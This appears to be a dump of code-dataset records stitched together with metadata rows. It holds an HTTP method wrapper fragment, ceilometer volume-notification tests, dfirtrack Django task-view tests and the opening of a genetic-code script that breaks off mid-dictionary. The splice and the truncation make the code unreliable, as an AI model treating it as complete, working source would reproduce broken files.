        return self.request('POST', url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allowRedirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)

    def put(self, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
        """HTTP PUT with spaces in *url* percent-encoded."""
        return self.request('PUT', url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allowRedirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)

    def delete(self, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
        """HTTP DELETE with spaces in *url* percent-encoded."""
        return self.request('DELETE', url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allowRedirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)

    def head(self, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
        """HTTP HEAD with spaces in *url* percent-encoded."""
        return self.request('HEAD', url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allowRedirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)

    def options(self, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
        """HTTP OPTIONS with spaces in *url* percent-encoded."""
        return self.request('OPTIONS', url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allowRedirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)
| 140.653846
| 266
| 0.758545
| 487
| 3,657
| 5.673511
| 0.112936
| 0.068404
| 0.032935
| 0.043069
| 0.868259
| 0.868259
| 0.868259
| 0.868259
| 0.868259
| 0.868259
| 0
| 0.005172
| 0.101176
| 3,657
| 25
| 267
| 146.28
| 0.835412
| 0
| 0
| 0
| 0
| 0
| 0.02297
| 0.007657
| 0
| 0
| 0
| 0
| 0
| 1
| 0.380952
| false
| 0
| 0.095238
| 0.333333
| 0.952381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
7c4c91d6d5bf63549f3d1ce334a97d269e174c59
| 14,328
|
py
|
Python
|
ceilometer/tests/volume/test_notifications.py
|
orbitfp7/ceilometer
|
9905da14bbdf06f95e1e056c9ca0e18087214d0f
|
[
"Apache-2.0"
] | 2
|
2015-09-07T09:15:26.000Z
|
2015-09-30T02:13:23.000Z
|
ceilometer/tests/volume/test_notifications.py
|
orbitfp7/ceilometer
|
9905da14bbdf06f95e1e056c9ca0e18087214d0f
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/tests/volume/test_notifications.py
|
orbitfp7/ceilometer
|
9905da14bbdf06f95e1e056c9ca0e18087214d0f
|
[
"Apache-2.0"
] | 1
|
2019-09-16T02:11:41.000Z
|
2019-09-16T02:11:41.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslotest import base
from ceilometer.volume import notifications
# Fixture payloads for the tests below: captured cinder (block storage)
# notification messages. NOTE(review): values look like devstack-era
# captures -- the exact schema should be confirmed against the cinder
# version under test.

# volume.exists audit notification (admin context, no project/user set).
NOTIFICATION_VOLUME_EXISTS = {
    u'_context_roles': [u'admin'],
    u'_context_request_id': u'req-7ef29a5d-adeb-48a8-b104-59c05361aa27',
    u'_context_quota_class': None,
    u'event_type': u'volume.exists',
    u'timestamp': u'2012-09-21 09:29:10.620731',
    u'message_id': u'e0e6a5ad-2fc9-453c-b3fb-03fe504538dc',
    u'_context_auth_token': None,
    u'_context_is_admin': True,
    u'_context_project_id': None,
    u'_context_timestamp': u'2012-09-21T09:29:10.266928',
    u'_context_read_deleted': u'no',
    u'_context_user_id': None,
    u'_context_remote_address': None,
    u'publisher_id': u'volume.ubuntu-VirtualBox',
    u'payload': {u'status': u'available',
                 u'audit_period_beginning': u'2012-09-20 00:00:00',
                 u'display_name': u'volume1',
                 u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
                 u'created_at': u'2012-09-20 15:05:16',
                 u'snapshot_id': None,
                 u'volume_type': None,
                 u'volume_id': u'84c363b9-9854-48dc-b949-fe04263f4cf0',
                 u'audit_period_ending': u'2012-09-21 00:00:00',
                 u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
                 u'launched_at': u'2012-09-20 15:05:23',
                 u'size': 2},
    u'priority': u'INFO'
}
# volume.delete.start notification (authenticated member context, size 3).
NOTIFICATION_VOLUME_DELETE = {
    u'_context_roles': [u'Member', u'admin'],
    u'_context_request_id': u'req-6ba8ccb4-1093-4a39-b029-adfaa3fc7ceb',
    u'_context_quota_class': None,
    u'event_type': u'volume.delete.start',
    u'timestamp': u'2012-09-21 10:24:13.168630',
    u'message_id': u'f6e6bc1f-fcd5-41e1-9a86-da7d024f03d9',
    u'_context_auth_token': u'277c6899de8a4b3d999f3e2e4c0915ff',
    u'_context_is_admin': True,
    u'_context_project_id': u'6c97f1ecf17047eab696786d56a0bff5',
    u'_context_timestamp': u'2012-09-21T10:23:54.741228',
    u'_context_read_deleted': u'no',
    u'_context_user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
    u'_context_remote_address': u'192.168.22.101',
    u'publisher_id': u'volume.ubuntu-VirtualBox',
    u'payload': {u'status': u'deleting',
                 u'volume_type_id': None,
                 u'display_name': u'abc',
                 u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
                 u'created_at': u'2012-09-21 10:10:47',
                 u'snapshot_id': None,
                 u'volume_id': u'3b761164-84b4-4eb3-8fcb-1974c641d6ef',
                 u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
                 u'launched_at': u'2012-09-21 10:10:50',
                 u'size': 3},
    u'priority': u'INFO'}
# volume.attach.end notification; same volume as the delete fixture.
NOTIFICATION_VOLUME_ATTACH = {
    u'_context_roles': [u'Member', u'admin'],
    u'_context_request_id': u'req-6ba8ccb4-1093-4a39-b029-adfaa3fc7ceb',
    u'_context_quota_class': None,
    u'event_type': u'volume.attach.end',
    u'timestamp': u'2012-09-21 10:24:13.168630',
    u'message_id': u'c994ae8d-d068-4101-bd06-1048877c844a',
    u'_context_auth_token': u'277c6899de8a4b3d999f3e2e4c0915ff',
    u'_context_is_admin': True,
    u'_context_project_id': u'6c97f1ecf17047eab696786d56a0bff5',
    u'_context_timestamp': u'2012-09-21T10:02:27.134211',
    u'_context_read_deleted': u'no',
    u'_context_user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
    u'_context_remote_address': u'192.168.22.101',
    u'publisher_id': u'volume.ubuntu-VirtualBox',
    u'payload': {u'status': u'in-use',
                 u'volume_type_id': None,
                 u'display_name': u'abc',
                 u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
                 u'created_at': u'2012-09-21 10:10:47',
                 u'snapshot_id': None,
                 u'volume_id': u'3b761164-84b4-4eb3-8fcb-1974c641d6ef',
                 u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
                 u'launched_at': u'2012-09-21 10:10:50',
                 u'size': 3},
    u'priority': u'INFO'}
# volume.detach.end notification; differs from ATTACH only in event_type
# and payload status.
NOTIFICATION_VOLUME_DETACH = {
    u'_context_roles': [u'Member', u'admin'],
    u'_context_request_id': u'req-6ba8ccb4-1093-4a39-b029-adfaa3fc7ceb',
    u'_context_quota_class': None,
    u'event_type': u'volume.detach.end',
    u'timestamp': u'2012-09-21 10:24:13.168630',
    u'message_id': u'c994ae8d-d068-4101-bd06-1048877c844a',
    u'_context_auth_token': u'277c6899de8a4b3d999f3e2e4c0915ff',
    u'_context_is_admin': True,
    u'_context_project_id': u'6c97f1ecf17047eab696786d56a0bff5',
    u'_context_timestamp': u'2012-09-21T10:02:27.134211',
    u'_context_read_deleted': u'no',
    u'_context_user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
    u'_context_remote_address': u'192.168.22.101',
    u'publisher_id': u'volume.ubuntu-VirtualBox',
    u'payload': {u'status': u'available',
                 u'volume_type_id': None,
                 u'display_name': u'abc',
                 u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
                 u'created_at': u'2012-09-21 10:10:47',
                 u'snapshot_id': None,
                 u'volume_id': u'3b761164-84b4-4eb3-8fcb-1974c641d6ef',
                 u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
                 u'launched_at': u'2012-09-21 10:10:50',
                 u'size': 3},
    u'priority': u'INFO'}
# volume.resize.end notification (status 'extending').
NOTIFICATION_VOLUME_RESIZE = {
    u'_context_roles': [u'Member', u'admin'],
    u'_context_request_id': u'req-6ba8ccb4-1093-4a39-b029-adfaa3fc7ceb',
    u'_context_quota_class': None,
    u'event_type': u'volume.resize.end',
    u'timestamp': u'2012-09-21 10:24:13.168630',
    u'message_id': u'b5814258-3425-4eb7-b6b7-bf4811203e58',
    u'_context_auth_token': u'277c6899de8a4b3d999f3e2e4c0915ff',
    u'_context_is_admin': True,
    u'_context_project_id': u'6c97f1ecf17047eab696786d56a0bff5',
    u'_context_timestamp': u'2012-09-21T10:02:27.134211',
    u'_context_read_deleted': u'no',
    u'_context_user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
    u'_context_remote_address': u'192.168.22.101',
    u'publisher_id': u'volume.ubuntu-VirtualBox',
    u'payload': {u'status': u'extending',
                 u'volume_type_id': None,
                 u'display_name': u'abc',
                 u'tenant_id': u'6c97f1ecf17047eab696786d56a0bff5',
                 u'created_at': u'2012-09-21 10:10:47',
                 u'snapshot_id': None,
                 u'volume_id': u'3b761164-84b4-4eb3-8fcb-1974c641d6ef',
                 u'user_id': u'4d2fa4b76a4a4ecab8c468c8dea42f89',
                 u'launched_at': u'2012-09-21 10:10:50',
                 u'size': 3},
    u'priority': u'INFO'}
# snapshot.exists audit notification; payload keys use snapshot_id and
# volume_size rather than volume_id/size.
NOTIFICATION_SNAPSHOT_EXISTS = {
    u'_context_roles': [u'admin'],
    u'_context_request_id': u'req-7ef29a5d-adeb-48a8-b104-59c05361aa27',
    u'_context_quota_class': None,
    u'event_type': u'snapshot.exists',
    u'timestamp': u'2012-09-21 09:29:10.620731',
    u'message_id': u'e0e6a5ad-2fc9-453c-b3fb-03fe504538dc',
    u'_context_auth_token': None,
    u'_context_is_admin': True,
    u'_context_project_id': None,
    u'_context_timestamp': u'2012-09-21T09:29:10.266928',
    u'_context_read_deleted': u'no',
    u'_context_user_id': None,
    u'_context_remote_address': None,
    u'publisher_id': u'volume.ubuntu-VirtualBox',
    u"payload": {u"audit_period_beginning": u"2014-05-06 11:00:00",
                 u"audit_period_ending": u"2014-05-06 12:00:00",
                 u"availability_zone": u"left",
                 u"created_at": u"2014-05-06 09:33:43",
                 u"deleted": u"",
                 u"display_name": "lil snapshot",
                 u"snapshot_id": u"dd163129-9476-4cf5-9311-dd425324d8d8",
                 u"status": u"available",
                 u"tenant_id": u"compliance",
                 u"user_id": u"e0271f64847b49429bb304c775c7427a",
                 u"volume_id": u"b96e026e-c9bf-4418-8d6f-4ba493bbb7d6",
                 u"volume_size": 3},
    u'priority': u'INFO'}
class TestNotifications(base.BaseTestCase):
    """Tests for the cinder volume/snapshot notification handlers.

    Fixes vs. the original:
    - test_volume_detach verified the sample against
      NOTIFICATION_VOLUME_ATTACH (copy-paste bug); it now uses
      NOTIFICATION_VOLUME_DETACH.
    - _verify_common_sample_volume asserted (actual, expected) for the
      sample name; arguments are now expected-first, consistent with the
      snapshot helper and every other assertEqual in the class.
    - The near-identical per-event test bodies are factored into the
      _check_volume/_check_volume_size helpers.
    """

    def _verify_common_sample_volume(self, s, name, notification):
        """Assert the fields shared by every volume-based sample."""
        self.assertIsNotNone(s)
        self.assertEqual(name, s.name)
        self.assertEqual(notification['payload']['volume_id'], s.resource_id)
        self.assertEqual(notification['timestamp'], s.timestamp)
        metadata = s.resource_metadata
        self.assertEqual(notification['publisher_id'], metadata.get('host'))

    def _check_volume(self, notification):
        """Run the Volume handler over *notification* and verify the sample."""
        v = notifications.Volume(mock.Mock())
        samples = list(v.process_notification(notification))
        self.assertEqual(1, len(samples))
        s = samples[0]
        self._verify_common_sample_volume(s, 'volume', notification)
        # A plain volume sample always counts a single event.
        self.assertEqual(1, s.volume)

    def _check_volume_size(self, notification):
        """Run the VolumeSize handler and verify the sample carries the size."""
        v = notifications.VolumeSize(mock.Mock())
        samples = list(v.process_notification(notification))
        self.assertEqual(1, len(samples))
        s = samples[0]
        self._verify_common_sample_volume(s, 'volume.size', notification)
        self.assertEqual(notification['payload']['size'], s.volume)

    def test_volume_exists(self):
        self._check_volume(NOTIFICATION_VOLUME_EXISTS)

    def test_volume_size_exists(self):
        self._check_volume_size(NOTIFICATION_VOLUME_EXISTS)

    def test_volume_delete(self):
        self._check_volume(NOTIFICATION_VOLUME_DELETE)

    def test_volume_size_delete(self):
        self._check_volume_size(NOTIFICATION_VOLUME_DELETE)

    def test_volume_attach(self):
        self._check_volume(NOTIFICATION_VOLUME_ATTACH)

    def test_volume_size_attach(self):
        self._check_volume_size(NOTIFICATION_VOLUME_ATTACH)

    def test_volume_detach(self):
        # Bug fix: previously verified against NOTIFICATION_VOLUME_ATTACH.
        self._check_volume(NOTIFICATION_VOLUME_DETACH)

    def test_volume_size_detach(self):
        self._check_volume_size(NOTIFICATION_VOLUME_DETACH)

    def test_volume_resize(self):
        self._check_volume(NOTIFICATION_VOLUME_RESIZE)

    def test_volume_size_resize(self):
        self._check_volume_size(NOTIFICATION_VOLUME_RESIZE)

    def _verify_common_sample_snapshot(self, s, name, notification):
        """Assert the fields shared by every snapshot-based sample."""
        self.assertIsNotNone(s)
        self.assertEqual(name, s.name)
        self.assertEqual(notification['payload']['snapshot_id'], s.resource_id)
        self.assertEqual(notification['timestamp'], s.timestamp)
        metadata = s.resource_metadata
        self.assertEqual(notification['publisher_id'], metadata.get('host'))

    def test_snapshot_exists(self):
        v = notifications.Snapshot(mock.Mock())
        samples = list(v.process_notification(NOTIFICATION_SNAPSHOT_EXISTS))
        self.assertEqual(1, len(samples))
        s = samples[0]
        self._verify_common_sample_snapshot(s, 'snapshot',
                                            NOTIFICATION_SNAPSHOT_EXISTS)
        self.assertEqual(1, s.volume)

    def test_snapshot_size_exists(self):
        v = notifications.SnapshotSize(mock.Mock())
        samples = list(v.process_notification(NOTIFICATION_SNAPSHOT_EXISTS))
        self.assertEqual(1, len(samples))
        s = samples[0]
        self._verify_common_sample_snapshot(s, 'snapshot.size',
                                            NOTIFICATION_SNAPSHOT_EXISTS)
        volume_size = NOTIFICATION_SNAPSHOT_EXISTS['payload']['volume_size']
        self.assertEqual(volume_size, s.volume)
| 44.635514
| 79
| 0.639657
| 1,783
| 14,328
| 4.900729
| 0.134605
| 0.054932
| 0.019226
| 0.01545
| 0.829137
| 0.789311
| 0.777295
| 0.76173
| 0.756924
| 0.730373
| 0
| 0.120518
| 0.234994
| 14,328
| 320
| 80
| 44.775
| 0.676672
| 0.038107
| 0
| 0.711744
| 0
| 0
| 0.354616
| 0.149052
| 0
| 0
| 0
| 0
| 0.120996
| 1
| 0.049822
| false
| 0
| 0.010676
| 0
| 0.064057
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c75d3c074bda401e2f00c41f96a27e86a47f048
| 8,318
|
py
|
Python
|
dfirtrack_main/tests/task/test_task_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 4
|
2020-03-06T17:37:09.000Z
|
2020-03-17T07:50:55.000Z
|
dfirtrack_main/tests/task/test_task_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | null | null | null |
dfirtrack_main/tests/task/test_task_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 1
|
2020-03-06T20:54:52.000Z
|
2020-03-06T20:54:52.000Z
|
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Task, Taskname, Taskpriority, Taskstatus
import urllib.parse
class TaskViewTestCase(TestCase):
""" task view tests """
@classmethod
def setUpTestData(cls):
# create user
test_user = User.objects.create_user(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# create object
taskname_1 = Taskname.objects.create(taskname_name='taskname_1')
# create object
taskpriority_1 = Taskpriority.objects.create(taskpriority_name='prio_1')
# create object
taskstatus_1 = Taskstatus.objects.create(taskstatus_name='taskstatus_1')
# create object
Task.objects.create(
taskname = taskname_1,
taskpriority = taskpriority_1,
taskstatus = taskstatus_1,
task_created_by_user_id = test_user,
task_modified_by_user_id = test_user,
)
def test_tasks_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/tasks/', safe='')
# get response
response = self.client.get('/tasks/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_tasks_list_logged_in(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/')
# compare
self.assertEqual(response.status_code, 200)
def test_tasks_list_template(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/task/tasks_list.html')
def test_tasks_list_get_user_context(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_task')
def test_tasks_detail_not_logged_in(self):
""" test detail view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# create url
destination = '/login/?next=' + urllib.parse.quote('/tasks/' + str(task_1.task_id), safe='')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_tasks_detail_logged_in(self):
""" test detail view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id))
# compare
self.assertEqual(response.status_code, 200)
def test_tasks_detail_template(self):
""" test detail view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id))
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/task/tasks_detail.html')
def test_tasks_detail_get_user_context(self):
""" test detail view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id))
# compare
self.assertEqual(str(response.context['user']), 'testuser_task')
def test_tasks_add_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/tasks/add/', safe='')
# get response
response = self.client.get('/tasks/add/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_tasks_add_logged_in(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/add/')
# compare
self.assertEqual(response.status_code, 200)
def test_tasks_add_template(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/add/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/task/tasks_add.html')
def test_tasks_add_get_user_context(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/add/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_task')
def test_tasks_edit_not_logged_in(self):
    """ test edit view """
    # look up the taskname fixture, then the task that references it
    taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
    task_1 = Task.objects.get(taskname=taskname_1)
    # expected redirect target: login page with the edit view as 'next'
    target = '/tasks/' + str(task_1.task_id) + '/edit/'
    destination = '/login/?next=' + urllib.parse.quote(target, safe='')
    # request the edit view anonymously, following the redirect chain
    response = self.client.get(target, follow=True)
    # an anonymous request must bounce to the login page
    self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_tasks_edit_logged_in(self):
    """ test edit view """
    # authenticate the test user first
    logged_in = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
    # look up the taskname fixture, then the task that references it
    taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
    task_1 = Task.objects.get(taskname=taskname_1)
    # fetch the edit form for that task
    response = self.client.get('/tasks/' + str(task_1.task_id) + '/edit/')
    # an authenticated user gets the form
    self.assertEqual(response.status_code, 200)
def test_tasks_edit_template(self):
    """ test edit view """
    # authenticate the test user first
    logged_in = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
    # look up the taskname fixture, then the task that references it
    taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
    task_1 = Task.objects.get(taskname=taskname_1)
    # fetch the edit form for that task
    response = self.client.get('/tasks/' + str(task_1.task_id) + '/edit/')
    # the edit view must render its dedicated template
    self.assertTemplateUsed(response, 'dfirtrack_main/task/tasks_edit.html')
def test_tasks_edit_get_user_context(self):
    """ test edit view

    The template context of the edit view must expose the logged-in user.
    """
    # get object
    taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
    # get object
    task_1 = Task.objects.get(taskname=taskname_1)
    # login testuser — assert success instead of discarding the result,
    # so a broken fixture fails here rather than in the context assertion below
    self.assertTrue(self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V'))
    # get response
    response = self.client.get('/tasks/' + str(task_1.task_id) + '/edit/')
    # compare
    self.assertEqual(str(response.context['user']), 'testuser_task')
| 37.133929
| 111
| 0.639336
| 944
| 8,318
| 5.427966
| 0.076271
| 0.054645
| 0.031616
| 0.071819
| 0.861827
| 0.827088
| 0.816354
| 0.808938
| 0.754879
| 0.748244
| 0
| 0.028249
| 0.242486
| 8,318
| 223
| 112
| 37.300448
| 0.784955
| 0.129959
| 0
| 0.530612
| 0
| 0
| 0.139825
| 0.019955
| 0
| 0
| 0
| 0
| 0.163265
| 1
| 0.173469
| false
| 0.132653
| 0.040816
| 0
| 0.22449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
7caa8e0f4b0ca4c9cf0870cfced5abe7f00a5a3c
| 416,254
|
py
|
Python
|
conRadNullDistribution.py
|
jsharbrough/conRadNullDistribution
|
b5570ed7b496d968308182575b984b9f100720ba
|
[
"MIT"
] | null | null | null |
conRadNullDistribution.py
|
jsharbrough/conRadNullDistribution
|
b5570ed7b496d968308182575b984b9f100720ba
|
[
"MIT"
] | null | null | null |
conRadNullDistribution.py
|
jsharbrough/conRadNullDistribution
|
b5570ed7b496d968308182575b984b9f100720ba
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import random
def polSub(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 
'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 